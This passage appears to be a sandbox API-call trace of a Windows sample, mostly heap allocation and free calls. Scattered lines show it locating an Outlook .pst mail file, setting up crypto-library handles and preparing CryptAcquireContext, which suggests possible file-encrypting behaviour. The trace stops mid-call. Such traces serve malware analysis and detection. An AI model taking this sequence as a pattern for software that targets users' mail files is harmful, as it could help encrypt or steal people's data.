[0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0084.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0084.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0084.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0084.864] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0084.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0084.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0084.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0084.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0084.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0084.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0084.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.866] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 0x41ac440 [0084.866] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0084.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0084.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0084.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0084.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0084.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.867] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.867] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0084.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0084.867] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0084.868] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0084.868] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0084.868] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0084.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.869] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.869] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.869] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0084.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0084.869] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0084.870] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0084.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.870] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0084.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0084.871] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.872] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, 